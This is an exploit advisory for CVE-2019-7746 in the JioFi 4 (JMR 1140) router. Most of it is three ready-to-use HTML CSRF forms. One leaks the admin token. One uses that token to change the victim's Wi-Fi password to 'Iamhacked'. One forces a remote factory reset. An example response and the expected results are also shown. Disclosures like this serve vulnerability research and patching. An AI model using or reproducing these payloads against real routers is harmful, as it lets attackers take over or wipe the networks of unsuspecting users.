# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router # Date: 12.02.2019 # Exploit Author: Ronnie T Baby # Contact:https://www.linkedin.com/in/ronnietbaby # Vendor Homepage: www.jio.com # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 # Category: Hardware (Wifi Router) # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-7746 Description: JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a /cgi-bin/qcmap_auth type=getuser request and then reading the token field. This token value can then be used to change the Wi-Fi password or perform a factory reset. POC- The exploit requires two csrf requests to be sent to the victim(logged to the web interface) connected to the Jiofi router. 1. First get admin tokens <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST"> <input type="hidden" name="type" value="getuser" /> <input type="submit" value="Submit request" /> </form> </body> </html> Example response- {"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"} Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="SetWiFi&#95;Setting" /> <input type="hidden" name="Mask" value="0" /> <input type="hidden" name="result" value="0" /> <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" /> <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" /> <input type="hidden" name="tx&#95;power" value="HIGH" /> <input type="hidden" name="wmm" value="Enable" /> <input type="hidden" name="wps&#95;enable" value="PushButton" /> <input type="hidden" name="wifi&#95;security" value="WPA2PSK" /> <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" /> <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" /> <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" /> <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" /> <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" /> <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" /> <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" /> <input type="hidden" name="channel&#95;mode" value="automatic" /> <input type="hidden" name="channel&#95;selection" value="11" /> <input type="hidden" name="sleep&#95;mode" value="Enable" /> <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" /> <input type="hidden" name="ssid&#95;broadcast" value="Enable" /> <input type="hidden" name="enable&#95;wifi" value="Enable" /> <input type="hidden" name="token" value="leakedtokens" /> <input type="submit" value="Submit request" /> </form> </body> </html> Wifi Password changed to Iamhacked Choice B) Perform Remote Factory Reset <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="type" value="FRST&#95;REAL" /> <input type="hidden" name="token" value="leakedtokens" /> <input type="submit" value="Submit request" /> </form> </body> </html> The router reboots to default settings. Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.